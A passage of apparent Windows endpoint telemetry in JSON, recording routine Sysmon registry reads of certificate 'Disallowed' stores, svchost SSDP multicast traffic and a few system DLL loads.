"timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570882150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "destination_address": "239.255.255.250", - "destination_port": "1900", - "event_type": "network", - "pid": 1156, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "127.0.0.1", - "source_port": "56578", - "subtype": "outgoing", - "timestamp": 131883570878990000, - "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "destination_address": "127.0.0.1", - "destination_port": "56578", - "event_type": "network", - "pid": 1156, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "udp", - "source_address": "239.255.255.250", - "source_port": "1900", - "subtype": "incoming", - "timestamp": 131883570879000000, - "unique_pid": "{42FC7E13-B2DB-5C05-0000-0010740A0500}", - "user": "NT AUTHORITY\\LOCAL SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "LOCAL SERVICE" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "usermgrcli.dll", - "image_path": "C:\\Windows\\System32\\usermgrcli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "ExecModelClient.dll", - "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570901369984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570901520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - 